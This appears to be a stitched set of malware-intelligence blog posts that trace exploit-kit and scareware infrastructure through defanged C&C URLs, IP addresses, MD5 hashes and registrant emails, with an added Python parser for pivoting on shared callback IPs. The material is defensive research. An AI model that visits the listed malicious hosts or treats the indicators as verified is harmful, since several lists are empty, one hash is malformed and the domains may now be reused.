On 2005-08-27, the domain (ltvv.com) is known to have responded to 198.65.115.93, then on 2006-05-12 to 204.13.161.31, with yet another IP change on 2010-04-08 to 216.240.187.145, followed by yet another change on 2010-06-02 to 69.43.160.145, with the same address recorded again on 2010-07-25.

On 2010-01-04, trafficinc.ru was registered using the auction@r01.ru email.

On 2009-03-01, trafficmonsterinc.ru was registered using the trafficmonsterinc.ru@r01-service.ru email.

Both of these .ru contacts are registrar-side placeholder addresses rather than the registrant's own, so they do not support a registrant pivot; the hosting overlap recorded below is what ties these two domains to the rest of the cluster.

On 2009-05-02, usl8.ru is known to have responded to 109.70.26.37; 185.12.92.229; 109.70.26.36, and was registered using the belyaev_andrey@inbox.ru email.

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: 0b545cd12231d0a4239ce837cd371166
MD5: dae41c862130daebcff0e463e2c30e50
MD5: 601806c0a01926c2a94558148764797a
MD5: 45f97cd8df4448bbe073a38c264ef93f
MD5: 94aeba45e6fb4d17baa4989511e321b3

Related malicious MD5s known to have phoned back to the same malicious C&C server IP (69.172.201.153):

MD5: 4e0ce2f9f92ac5193c2a383de6015523
MD5: a38d47fcfdaf14372cea3de850cf487d
MD5: 014d2f1bae3611e016f96a37f98fd4b7
MD5: daad60cb300101dc05d2ff922966783b
MD5: 0a775110077e2c583be56e5fb3fa4f09

Once executed, a sample malware (MD5: 4e0ce2f9f92ac5193c2a383de6015523) phones back to the following malicious C&C server IPs:

hxxp://pelcpawel.fm.interia.pl - 217.74.66.160
hxxp://pelcpawel.fm.interiowo.pl - 217.74.66.160
hxxp://chicostara.com - 91.142.252.26
hxxp://suewyllie.com
hxxp://dewpoint-eg.com - 195.157.15.100
hxxp://sso.anbtr.com - 195.22.28.222

Once executed, a sample malware (MD5: a38d47fcfdaf14372cea3de850cf487d) phones back to the following malicious C&C server IPs:

hxxp://ledyazilim.com - 213.128.83.163
hxxp://ksandrafashion.com - 166.78.145.90
hxxp://lafyeri.com - 69.172.201.153
hxxp://kulppasur.com - 52.28.249.128
hxxp://toalladepapel.com.ar

Not every host in these callback lists is necessarily attacker-owned: free-hosting subdomains (such as the interia.pl ones) and ordinary-looking small-business sites frequently turn out to be compromised relays, so weigh them accordingly before blocking on them.

hxxp://trafficinc.ru is known to have responded to 222.73.91.203

hxxp://trafficmonsterinc.ru is known to have responded to 178.208.83.7; 178.208.83.27; 91.203.4.112

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: ce4e2e12ee16d5bde67a3dc2e3da634b
MD5: 4423e04fb3616512bf98b5a565fccdd7
MD5: 33f890c294b2ac89d1ee657b94e4341d
MD5: 1c5096c3ce645582dd18758fe523840a
MD5: 1efae0b0cb06faacae46584312a12504

Once executed, a sample malware (MD5: ce4e2e12ee16d5bde67a3dc2e3da634b) phones back to the following malicious C&C server IPs:

hxxp://rms-server.tektonit.ru - 109.234.156.179
hxxp://365invest.ru - 178.208.83.7

Once executed, a sample malware (MD5: 4423e04fb3616512bf98b5a565fccdd7) phones back to the following malicious C&C server IP:

hxxp://topstat.mcdir.ru - 178.208.83.7

Once executed, a sample malware (MD5: 33f890c294b2ac89d1ee657b94e4341d) phones back to the following malicious C&C server IP:

hxxp://cadretest.ru - 178.208.83.7

Once executed, a sample malware (MD5: 1c5096c3ce645582dd18758fe523840a) phones back to the following malicious C&C server IPs:

hxxp://pelcpawel.fm.interia.pl - 217.74.65.161
hxxp://testtrade.ru - 178.208.83.7
hxxp://chicostara.com - 91.142.252.26

Four of the five samples share 178.208.83.7, the same address trafficmonsterinc.ru resolved to, which is the overlap that holds this cluster together. Note that rms-server.tektonit.ru appears to be the vendor host of a commercial remote-administration tool, which suggests the first sample bundles that tool rather than a bespoke backdoor; the vendor host itself should not be blocked on the strength of this list alone.

In 2009, I profiled the direct compromise of [16]Embassy of India in Spain Serving Malware, further detailing the malicious activity and establishing a direct connection between the group's activities and the Russian Business Network.

On 2008-09-07, msn-analytics.net was registered using the palfreycrossvw@gmail.com email. On 2007-06-17 it used to respond to 82.98.235.50; it then changed IPs on 2008-09-07 to 58.65.234.9, followed by another change on 2009-11-14 to 96.9.183.149, then to 96.9.158.41 on 2009-12-29, and to 85.249.229.195 on 2010-03-09.

On 2008-07-10, pinoc.org was registered using the 4ykakabra@gmail.com email. On 2008-07-10 it responded to 58.65.234.9; it then changed IPs on 2008-08-17 to 91.203.92.13, followed by another change on 2008-08-24 back to 58.65.234.9, followed by yet another change to 208.73.210.76 on 2009-10-03, and yet another change on 2009-10-06 to 96.9.186.245.

On 2008-09-20, wsxhost.net was registered using the palfreycrossvw@gmail.com email. On 2008-09-20 wsxhost.net responded to 58.65.234.9; it then changed IPs on 2008-12-22 to 202.73.57.6, followed by another change on 2009-05-18 to 202.73.57.11, yet another change on 2009-06-22 to 92.38.0.66, then to 91.212.198.116 on 2009-07-06, yet another change on 2009-08-17 to 210.51.187.45, then to 210.51.166.239 on 2009-08-25, and finally to 213.163.89.54 on 2009-09-05.

Two overlaps make these three domains one cluster: msn-analytics.net and wsxhost.net share the registrant palfreycrossvw@gmail.com, and all three resolved to 58.65.234.9 during 2008.

On 2008-06-29, google-analyze.cn was registered using the johnvernet@gmail.com email.

Historically (up to the present day), johnvernet@gmail.com is known to have registered the following domains:

hxxp://baidustatz.com
hxxp://edcomparison.com
hxxp://google-analyze.org
hxxp://google-stat.com
hxxp://kolkoman.com
hxxp://m-analytics.net
hxxp://pinalbal.com
hxxp://pornokman.com
hxxp://robokasa.com
hxxp://rx-white.com
hxxp://sig4forum.com
hxxp://thekapita.com
hxxp://visittds.com

Several of these (google-analyze, google-stat, baidustatz, m-analytics) imitate Web analytics services, a naming choice that makes the callback traffic look like benign tracking requests in proxy logs and is worth a dedicated lookalike rule.

msn-analytics.net is known to have responded to 216.157.88.21; 85.17.25.214; 216.157.88.22; 85.17.25.215; 85.17.25.202; 216.157.88.25; 5.39.99.49; 167.114.156.214; 5.39.99.50; 66.135.63.164; 85.17.25.242; 69.43.161.210

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: eb95798965a18e7844f4c969803fbaf8
MD5: 106b6e80be769fa4a87560f82cd24b57
MD5: 519a9f1cb16399c515723143bf7ff0d0
MD5: b537c3d65ecc8ac0f3cd8d6bf3556da5
MD5: 613e8c31edf4da1b8f8de9350a186f41

Once executed, a sample malware (MD5: eb95798965a18e7844f4c969803fbaf8) phones back to the following malicious C&C server IPs:

hxxp://vboxsvr.ovh.net
hxxp://thinstall.abetterinternet.com - 85.17.25.214
hxxp://survey-winner.net - 94.229.72.117
hxxp://survey-winner.net - 208.91.196.145
hxxp://comedy-planet.com

Once executed, a sample malware (MD5: 106b6e80be769fa4a87560f82cd24b57) phones back to the following malicious C&C server IPs:

hxxp://memberfortieth.net
hxxp://beginadvance.net
hxxp://knownadvance.net
hxxp://beginstranger.net
hxxp://knownstranger.net - 23.236.62.147

Once executed, a sample malware (MD5: b537c3d65ecc8ac0f3cd8d6bf3556da5) phones back to the following malicious C&C server IPs:

hxxp://followfortieth.net
hxxp://memberfortieth.net
hxxp://beginadvance.net
hxxp://knownadvance.net
hxxp://beginstranger.net
hxxp://knownstranger.net - 23.236.62.147

The two-word .net names in the last two lists (begin-, known-, member-, follow- combined with -advance, -stranger, -fortieth) look like a word-list generation scheme rather than hand-picked names. Against such a scheme, blocking individual names lags the generator; the resolved address (23.236.62.147 here) and the naming pattern itself are the durable indicators.



pinoc.org is known to have responded to 103.224.212.222; 185.53.179.24; 185.53.179.9; 185.53.177.10; 188.40.174.81; 46.165.247.18; 178.162.184.130

Caveat: 103.224.212.222 and the 185.53.177.x/185.53.179.x addresses are widely used domain-parking ranges, and the ww1./ww38. hostnames in the callback lists below are parking-page subdomains. A sample calling out to them most likely means its original C&C domain had expired and been parked by the time it was run, so overlap on these addresses points to lapsed infrastructure rather than a shared operator and should not be used as a pivot.

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: 000125b0d0341fc078c7bdb5b7996f9e
MD5: b3bbeaca85823d5c47e36959b286bb22
MD5: 4faa9445394ba4edf73dd67e239bcbca
MD5: 9f3b9de8a3e7cd8ee2d779396799b17a
MD5: 38d07b2a1189eb1fd64296068fbaf08a

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://os.onlineapplicationsdownloads.com - 103.224.212.222
hxxp://static.greatappsdownload.com - 54.230.187.48
hxxp://ww1.os.onlineapplicationsdownloads.com - 91.195.241.80
hxxp://os2.onlineapplicationsdownloads.com - 103.224.212.222
hxxp://ww1.os2.onlineapplicationsdownloads.com - 91.195.241.80

Once executed, a sample malware phones back to the following malicious C&C server IP:

hxxp://errors.myserverstat.com - 103.224.212.222

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://scripts.dlv4.com - 103.224.212.222
hxxp://ww38.scripts.dlv4.com - 185.53.179.29

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://complaintsboard.com - 208.100.35.85
hxxp://7ew8gov.firoli-sys.com - 103.224.212.222
hxxp://yx-vom2s.hdmediastore.com - 45.33.9.234
hxxp://q8x3kb.wwwmediahosts.com - 204.11.56.48

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://newworldorderreport.com - 50.63.202.29
hxxp://69jh93.firoli-sys.com - 103.224.212.222
hxxp://bpvvllndq5.wwwmediahosts.com - 204.11.56.48
hxxp://odbhwuja.hdmediastore.com - 45.33.9.234
wsxhost.net is known to have responded to 184.168.221.45; 50.63.202.82; 69.43.161.172

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: 117036e5a7b895429e954f733e0acada
MD5: 1172e5a2ca8a43a2a2274f2c3b76a7be
MD5: 6e330742d22c5a5e99e6490de65fabd6
MD5: f1c9cd766817ccf55e30bb8af97bfdbb
MD5: 7f4145bc211089d9d3c666078c35cf3d

Once executed, a sample malware (MD5: 117036e5a7b895429e954f733e0acada) phones back to the following malicious C&C server IPs:

hxxp://amacweb.org
hxxp://superaffiliatehookup.com
hxxp://germanamericantax.com
hxxp://lineaidea.it
hxxp://speedysalesletter.com

Once executed, a sample malware (MD5: 1172e5a2ca8a43a2a2274f2c3b76a7be) phones back to the following malicious C&C server IPs:

hxxp://allstatesdui.com - 50.63.202.36
hxxp://wellingtontractorparts.com - 72.167.232.158
hxxp://amacweb.org - 160.16.211.99
hxxp://nctcogic.org - 207.150.212.74

Once executed, a sample malware (MD5: 6e330742d22c5a5e99e6490de65fabd6) phones back to the following malicious C&C server IPs:

hxxp://santele.be - 176.62.170.69
hxxp://fever98radio.com - 141.8.224.93
hxxp://brushnpaint.com - 74.220.219.132
hxxp://jameser.com - 54.236.195.15
hxxp://hillsdemocrat.com - 67.225.168.30

Once executed, a sample malware (MD5: f1c9cd766817ccf55e30bb8af97bfdbb) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 109.70.26.37
hxxp://afterpeace.net - 195.38.137.100
hxxp://sellhouse.net - 184.168.221.45

Once executed, a sample malware (MD5: 7f4145bc211089d9d3c666078c35cf3d) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 109.70.26.37
hxxp://forcerain.net
hxxp://afterrain.net - 50.63.202.43
hxxp://forcerain.ru
hxxp://forceheld.net

Two overlaps are worth separating here. lordofthepings.ru resolves to 109.70.26.37, the same address usl8.ru responded to earlier in this post, which is a genuine hosting pivot. sellhouse.net and wsxhost.net both resolved to 184.168.221.45, but that address and the 50.63.202.x addresses in these lists sit in widely used registrar-parking ranges, so that overlap most likely reflects both domains having lapsed and is a weak pivot at best.
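Every "Once executed, a sample malware (MD5: ...) phones back to ..." listing in this post, and in the IcePack post that follows, has the same shape: a sample hash, then one "hxxp://host - IP" line per callback, with the IP sometimes missing. The following is an added example, not code from the original post, that parses that text into a sample-to-host-to-IP graph, refangs the hxxp:// scheme, validates hashes as 32 hex digits, rejects impossible IPv4 octets, and then inverts the graph to find IPs that more than one sample contacts, which is exactly the "same C&C server IPs" relation the post pivots on. The sample text is constructed from the trafficmonsterinc.ru cluster above.

```python
import re
from collections import defaultdict

# Constructed from the callback listings in this post (one cluster, verbatim shape).
SAMPLE_TEXT = """\
Once executed, a sample malware (MD5: ce4e2e12ee16d5bde67a3dc2e3da634b) phones back to the following malicious C&C server IPs:

hxxp://rms-server.tektonit.ru - 109.234.156.179
hxxp://365invest.ru - 178.208.83.7

Once executed, a sample malware (MD5: 4423e04fb3616512bf98b5a565fccdd7) phones back to the following malicious C&C server IPs:

hxxp://topstat.mcdir.ru - 178.208.83.7

Once executed, a sample malware (MD5: 33f890c294b2ac89d1ee657b94e4341d) phones back to the following malicious C&C server IPs:

hxxp://cadretest.ru - 178.208.83.7

Once executed, a sample malware (MD5: 1c5096c3ce645582dd18758fe523840a) phones back to the following malicious C&C server IPs:

hxxp://pelcpawel.fm.interia.pl - 217.74.65.161
hXXp://testtrade.ru - 178.208.83.7
hxxp://chicostara.com - 91.142.252.26
hxxp://suewyllie.com
"""

MD5_RE = re.compile(r"MD5:\s*([0-9a-fA-F]{32})\b")
# A callback line: defanged (hxxp/hXXp) or real scheme, optional " - IPv4" suffix.
CALLBACK_RE = re.compile(
    r"^(?P<url>h(?:xx|XX|tt)ps?://\S+)(?:\s+-\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?\s*$"
)


def refang(url):
    """Turn a defanged hxxp:// URL into a real one with a lower-cased host."""
    scheme, sep, rest = url.partition("://")
    scheme = scheme.lower().replace("hxxp", "http")
    host, slash, path = rest.partition("/")
    return f"{scheme}{sep}{host.lower()}{slash}{path}"


def host_of(url):
    """Bare hostname of a (possibly defanged) URL."""
    return refang(url).partition("://")[2].partition("/")[0]


def valid_ipv4(ip):
    parts = ip.split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def parse_callbacks(text):
    """Return {md5: [(host, ip_or_None), ...]} in document order."""
    callbacks = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        found = MD5_RE.search(line)
        if found:
            current = found.group(1).lower()
            callbacks.setdefault(current, [])
            continue
        hit = CALLBACK_RE.match(line)
        if hit and current is not None:
            ip = hit.group("ip")
            if ip is not None and not valid_ipv4(ip):
                ip = None  # an octet above 255 is extraction damage, not an indicator
            callbacks[current].append((host_of(hit.group("url")), ip))
    return callbacks


def shared_c2_ips(callbacks, minimum=2):
    """Invert the graph: IPs contacted by at least `minimum` distinct samples."""
    by_ip = defaultdict(set)
    for md5, hits in callbacks.items():
        for _, ip in hits:
            if ip:
                by_ip[ip].add(md5)
    return {ip: sorted(md5s) for ip, md5s in by_ip.items() if len(md5s) >= minimum}


def hosts_without_ip(callbacks):
    """Hosts listed with no resolution: candidates for a passive-DNS lookup."""
    return sorted({h for hits in callbacks.values() for h, ip in hits if ip is None})


if __name__ == "__main__":
    graph = parse_callbacks(SAMPLE_TEXT)
    for ip, samples in shared_c2_ips(graph).items():
        print(f"{ip} is contacted by {len(samples)} samples: {', '.join(samples)}")
    print("unresolved:", ", ".join(hosts_without_ip(graph)))
```

On the constructed text the inversion reports 178.208.83.7 as contacted by all four samples and flags suewyllie.com as the one host still needing a resolution. The same parser works on the other listings in this post once their hashes have been normalised to 32 hex digits; a hash that fails that check is a transcription error to fix, not an indicator to load.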

google-analyze.cn is known to have responded to 103.51.144.81; 184.105.178.89; 65.19.157.235; 124.16.31.146; 123.254.111.190; 103.232.215.140; 103.232.215.147; 205.164.14.78; 50.117.116.117; 50.117.120.254; 205.164.24.45; 50.117.116.205; 50.117.122.90; 184.105.178.84; 50.117.116.204

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: df05460b5e49cbba275f6d5cbd936d1d
MD5: 7732ffcf2f4cf1d834b56df1f9d815c9
MD5: 615eb515da18feb2b87c0fb5744411ac
MD5: 24fec5b3ac1d20e61f2a3de95aeb177c
MD5: 348eed9b371ddb2755eb5c2bfaa782ee

On 2008-08-27, yahoo-analytics.net was registered using the fuadrenalray@gmail.com email.

- google-analyze.org - Email: johnvernet@gmail.com - on 2008-07-09, google-analyze.org is known to have responded to 58.65.234.9, followed by a hosting change on 2008-08-17 pointing to 91.203.92.13, followed by another hosting change on 2008-08-24 pointing to 202.73.57.6.

- qwehost.com - Email: 4ykakabra@gmail.com - on 2009-05-18, qwehost.com is known to have responded to 202.73.57.11 (recorded twice), followed by a hosting change on 2009-06-22 pointing to 92.38.0.66, followed by yet another hosting change pointing to 91.212.198.116, followed by yet another hosting change on 2009-08-17 pointing to 210.51.187.45.

- zxchost.com - Email: 4ykakabra@gmail.com - on 2009-03-02, zxchost.com is known to have responded to 202.73.57.6, followed by a hosting change on 2009-05-18 pointing to 202.73.57.11, followed by yet another hosting change on 2009-06-22 pointing to 92.38.0.66, followed by yet another hosting change on 2009-08-25 pointing to 210.51.166.239.

- odile-marco.com - Email: OdileMarcotte@gmail.com - on 2009-05-18, odile-marco.com is known to have responded to 202.73.57.6, followed by a hosting change on 2009-06-22 pointing to 202.73.57.11, followed by yet another hosting change on 2009-07-06 pointing to 92.38.0.66, followed by yet another hosting change on 2009-08-17 pointing to 91.212.198.116.

- edcomparison.com - Email: johnvernet@gmail.com - on 2009-05-18, edcomparison.com is known to have responded to 202.73.57.6, followed by a hosting change on 2009-06-22 pointing to 202.73.57.11, followed by yet another hosting change on 2009-07-13, this time pointing to 92.38.0.66, followed by yet another hosting change on 2009-08-17, this time pointing to 210.51.187.45.

- fuadrenal.com - Email: fuadrenalRay@gmail.com - on 2009-01-26, fuadrenal.com is known to have responded to 202.73.57.6, followed by a hosting change on 2009-05-18 pointing to 202.73.57.11, followed by yet another hosting change on 2009-07-13, this time pointing to 91.212.198.116, with the same address recorded again on 2009-08-17.

- rx-white.com - Email: johnvernet@gmail.com - on 2009-05-18, rx-white.com is known to have responded to 202.73.57.6, followed by a hosting change on 2009-06-22 pointing to 202.73.57.11, followed by yet another hosting change on 2009-07-06, this time pointing to 92.38.0.66, followed by yet another hosting change on 2009-08-17, this time pointing to 91.212.198.116.

Taken together, every domain in this list, across four different registrant emails, walks the same sequence of hosts (202.73.57.6, then 202.73.57.11, then 92.38.0.66, then 91.212.198.116 or 210.51.x) on the same handful of dates, and wsxhost.net above follows the identical sequence. A lockstep move of this kind is a far stronger sign of a single operator relocating a whole portfolio than any one shared IP on its own.

In 2009, I profiled the direct compromise of [17]Embassy of Portugal in India Serving Malware, further establishing a direct connection between the group's activities and the Russian Business Network.

On 2009-03-30, ntkrnlpa.info is known to have responded to 83.68.16.6. Related domains known to have participated in the same campaign: betstarwager.cn; ntkrnlpa.cn.

In 2007, I profiled the direct compromise of French Embassy in Libya Serving Malware, further establishing a direct connection between the group's activities and the Russian Business Network.

On 2008-11-05, tarog.us (Email: bobbyl0@mail.zp.ua) used to respond to 67.210.13.94, followed by a hosting change on 2009-03-02 pointing to 208.73.210.121. Related domains known to have participated in the campaign: fernandol23.ws; winhex.org - Email: [18]ipspec@gmail.com

On 2007-02-18, winhex.org used to respond to 195.189.247.56, followed by a hosting change on 2007-03-03 pointing to 89.108.85.97, followed by yet another hosting change on 2007-04-29, this time pointing to 203.121.71.165, followed by yet another hosting change on 2007-08-19, this time pointing to 69.41.162.77.

On 2007-11-23, kjlksjwflk.com (Email: sflgjlkj45@yahoo.com) used to respond to 58.65.239.114, followed by a hosting change on 2009-02-16 pointing to 38.117.90.45, followed by yet another hosting change on 2009-03-09, this time pointing to 216.188.26.235.

In 2009, I profiled the direct compromise of [19]Azerbaijanian Embassies in Pakistan and Hungary Serving Malware, further establishing a direct connection between the group's activities and the Russian Business Network.

Related domains known to have participated in the campaign:

- hxxp://filmlifemusicsite.cn; hxxp://promixgroup.cn; hxxp://betstarwager.cn; hxxp://clickcouner.cn

In 2009, I profiled the direct compromise of [20]USAID.gov compromised, malware and exploits served, further establishing a direct connection between the gang's activities and the New Media Malware Gang.

Related domains known to have participated in the campaign:

hxxp://should-be.cn - Email: admin@brut.cn; hxxp://orderasia.cn; hxxp://fileuploader.cn

In 2007, I profiled the direct compromise of [21]U.S Consulate St. Petersburg Serving Malware, further establishing a direct connection between the group's activities and the Russian Business Network.

On 2007-08-31, verymonkey.com (Email: srvs4you@gmail.com) used to respond to 212.175.23.114, followed by a hosting change on 2007-09-07 pointing to 209.123.181.185, followed by yet another hosting change on 2007-09-27, this time pointing to 88.255.90.50, followed by yet another hosting change on 2008-11-11, this time pointing to 216.188.26.235.

Several overlaps tie these embassy campaigns to the infrastructure profiled earlier in this section: verymonkey.com also appears in the domain portfolio at the top of the section; 216.188.26.235 is shared by verymonkey.com (2008-11-11) and kjlksjwflk.com (2009-03-09); winhex.org's window on 203.121.71.165 (2007-04-29 to 2007-08-19) overlaps miron555.org's (2007-05-09 to 2007-06-08); and betstarwager.cn appears in both the Portugal and the Azerbaijan embassy campaigns.

What is particularly interesting about the gang's activities is that back in 2007 the group pioneered the use of Web malware exploitation kits, using the infrastructure of the Russian Business Network to launch a multitude of malicious campaigns spreading malicious software.

Related posts:

[22] Syrian Embassy in London Serving Malware

[23] USAID.gov compromised, malware and exploits served

[24] U.S Consulate St. Petersburg Serving Malware

[25] Bank of India Serving Malware

[26] French Embassy in Libya Serving Malware

[27] The Dutch Embassy in Moscow Serving Malware

[28] Ethiopian Embassy in Washington D.C Serving Malware

[29] Embassy of India in Spain Serving Malware

[30] Azerbaijanian Embassies in Pakistan and Hungary Serving Malware
malware-and-exploits-served/

6. https://web-beta.archive.org/web/20101016191925/http://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

7. https://web-beta.archive.org/web/20101016191941/http://ddanchev.blogspot.com/2007/08/bank-of-india-serving-malware.html

8. https://web-beta.archive.org/web/20101126202011/http://ddanchev.blogspot.com/2007/12/have-your-malware-in-timely-fashion.html

9. https://web-beta.archive.org/web/20120304075303/http://ddanchev.blogspot.com/2009/03/ethiopian-embassy-in-washington-dc.html

10. https://web-beta.archive.org/web/20131222200157/http://ddanchev.blogspot.com/2009/01/embassy-of-india-in-spain-serving.html

11. https://web-beta.archive.org/web/20120303071653/http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html

12. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html

13. https://web-beta.archive.org/web/20080221124306/http://ddanchev.blogspot.com/2008/01/dutch-embassy-in-moscow-serving-malware.html

14. https://web-beta.archive.org/web/20120303000438/http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html

15. https://web-beta.archive.org/web/20120304075303/http://ddanchev.blogspot.com/2009/03/ethiopian-embassy-in-washington-dc.html

16. https://web-beta.archive.org/web/20131222200157/http://ddanchev.blogspot.com/2009/01/embassy-of-india-in-spain-serving.html

17. https://web-beta.archive.org/web/20101127020203/http://ddanchev.blogspot.com/2009/03/embassy-of-portugal-in-india-serving.html

18. mailto:ipspec@gmail.com

19. https://web-beta.archive.org/web/20120303071653/http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html

20. http://www.zdnet.com/article/usaid-gov-compromised-malware-and-exploits-served/

21. https://web-beta.archive.org/web/20101016191925/http://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

22. https://web-beta.archive.org/web/20101016191925/http://ddanchev.blogspot.com/2007/09/syrian-embassy-in-london-serving.html

23. http://www.zdnet.com/article/usaid-gov-compromised-malware-and-exploits-served/

24. https://web-beta.archive.org/web/20101016191925/http://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

25. https://web-beta.archive.org/web/20101016191941/http://ddanchev.blogspot.com/2007/08/bank-of-india-serving-malware.html

26. https://web-beta.archive.org/web/20101126202011/http://ddanchev.blogspot.com/2007/12/have-your-malware-in-timely-fashion.html

27. https://web-beta.archive.org/web/20080221124306/http://ddanchev.blogspot.com/2008/01/dutch-embassy-in-moscow-serving-malware.html

28. https://web-beta.archive.org/web/20120304075303/http://ddanchev.blogspot.com/2009/03/ethiopian-embassy-in-washington-dc.html

29. https://web-beta.archive.org/web/20131222200157/http://ddanchev.blogspot.com/2009/01/embassy-of-india-in-spain-serving.html

30. https://web-beta.archive.org/web/20120303071653/http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html
Historical OSINT - A Portfolio of Exploits Serving Domains (2017-05-29 09:04)

With Web malware exploitation kits continuing to proliferate, cybercriminals are poised to keep earning fraudulent revenue by monetizing access to malware-infected hosts, relying on client-side exploits to spread malicious software and potentially compromising the confidentiality, availability and integrity of the targeted host.

What used to be an ecosystem dominated by proprietary DIY (do-it-yourself) malware and exploit generating tools is today's modern cybercrime ecosystem dominated by Web malware exploitation kits, which hand novice cybercriminals the tactics, techniques and procedures needed to launch a fraudulent and malicious campaign potentially affecting hundreds of thousands of users globally.

In this post we'll provide actionable intelligence on currently active IcePack Web malware exploitation kit client-side exploit and malware serving domains.

Related IcePack Web Malware Exploitation Kit domains:

hxxp://seateremok.com/xc/index.php
hxxp://lskdfjlerjvm.com/ice-pack/index.php
hxxp://formidleren.dk/domain/mere.asp
hxxp://webs-money.info/ice-pack/index.php
hxxp://greeetthh.com/ice-pack1/index.php
hxxp://58.65.235.153/pozitive/ice/index.php
hxxp://iframe911.com/troy/us/sp/ice/index.php
hxxp://themusicmp3.info/rmpanfr/index.php

The kit's default install path (ice-pack/index.php, or a renamed ice/ directory) survives in most of these URLs, which makes the path itself a usable proxy-log signature even after the domains rotate.

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (lskdfjlerjvm.com):

MD5: 4c0958f2f9f5ff2e5ac47e92d4006452
MD5: d955372c7ef939502c43a71ff1a9f76e
MD5: 118e24ea884d375dc9f63c986a15e5df
MD5: e825a7e975a9817441da9ba1054a3e6f
MD5: 71460d4a1c7c18ec672fed56d764ebe6

Once executed, a sample malware (MD5: d955372c7ef939502c43a71ff1a9f76e) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 109.70.26.37
hxxp://tableshown.net - 208.100.26.234
hxxp://leadshown.net
hxxp://tablefood.ru
hxxp://tablefood.net - 180.210.34.47
hxxp://leadfood.net
hxxp://tablemeet.net
hxxp://leadmeet.net
hxxp://pointneck.net
hxxp://pointshown.net
hxxp://callshown.net - 212.61.180.100
hxxp://callneck.ru
hxxp://callneck.net
hxxp://ringshown.ru
hxxp://ringshown.net
hxxp://noneshown.net

riddenstorm.net (208.100.26.234) and lordofthepings.ru (109.70.26.37) also appear, with the same addresses, in the callback lists of the wsxhost.net-linked samples in the preceding post, tying this IcePack infrastructure to that cluster. The remaining two-word names (table-, lead-, point-, call-, ring- combined with -shown, -food, -meet, -neck) follow the same word-list generation pattern seen there.

We'll continue monitoring the campaigns and post updates as soon as new developments take place.
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Historical OSINT - A Portfolio of Fake/Rogue Video 
Codecs (2017-05-29 09:27) 

Shall we expose a huge domains portfolio of fake/rogue video 
codecs dropping the same Zlob variant on each and 

every of the domains, thereby acting as a great example of 
what malicious economies of scale means? 

Currently active Zlob malware variants promoting 
sites: 


Related MD5s known to have participated in the campaign: 

MD5: 30965fdbd893990dd24abda2285d9edc 

Why are the malicious parties so KISS oriented at the end of every campaign, compared to the complexity and tactical warfare tricking automated malware harvesting approaches at the beginning of the campaign? Because they're not even considering the possibility of proactively detecting the end of many other malware campaigns to come, which will inevitably end up at these domains. 
Historical OSINT - A Diversified Portfolio of Fake Security Software (2017-05-29 09:38) 

Cybercriminals continue actively launching malicious and fraudulent campaigns, further spreading malicious software and potentially exposing the confidentiality, availability and integrity of the targeted host to a multitude of malicious software. 

In this post we'll profile a currently active portfolio of fake security software and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. 

Known to have responded to the same malicious C&C server IPs (91.212.226.203; 94.228.209.195) are also the following malicious domains: 


Known to have responded to the same malicious C&C server IPs (94.228.209.195) are also the following malicious domains: 

Related fraudulent and malicious domains known to have participated in the campaign: 


Known to have responded to the same malicious C&C server IPs (91.212.226.203) are also the following malicious domains: 


We'll continue monitoring the campaign and post updates as soon as new developments take place. 
Historical OSINT - Google Sponsored Scareware Spotted in the Wild (2017-05-29 15:48) 

Cybercriminals continue actively spreading malicious software while looking for alternative ways to acquire and monetize legitimate traffic, successfully earning fraudulent revenue in the process of spreading malicious software. 

We've recently come across a Google Sponsored scareware campaign successfully enticing users into installing fake security software on their hosts, further earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate-network based type of revenue sharing scheme. 

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. 


Malicious domains known to have participated in the campaign: 

hxxp://www.adwarepronow.com/?gclid=CJ6d8LSGnZ8CFRMqagodmR_KaA - 209.216.193.112 

hxxp://www.antimalware-2010.com/ - 209.216.193.119 

Sample detection rates for sample malware: 

MD5: 8328da91c8eba6668b3e72d547157ac7 

MD5: b74412ea403241c9c60482fdl3540505 

Once executed, a sample malware phones back to the following malicious C&C server IPs: 

hxxp://72.167.164.199/definitions/configuration.txt 

hxxp://72.167.164.199/latestversion/AntiMalwarePro_appversion.txt 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
Historical OSINT - A Diversified Portfolio of Pharmaceutical Scams Spotted in the Wild (2017-05-29 16:04) 

Cybercriminals continue actively spreading fraudulent and malicious campaigns, potentially exposing the confidentiality, availability and integrity of the targeted host to a multitude of malicious software, further earning fraudulent revenue in the process of monetizing access to malware-infected hosts, and further spreading malicious and fraudulent campaigns potentially affecting hundreds of thousands of users globally. 

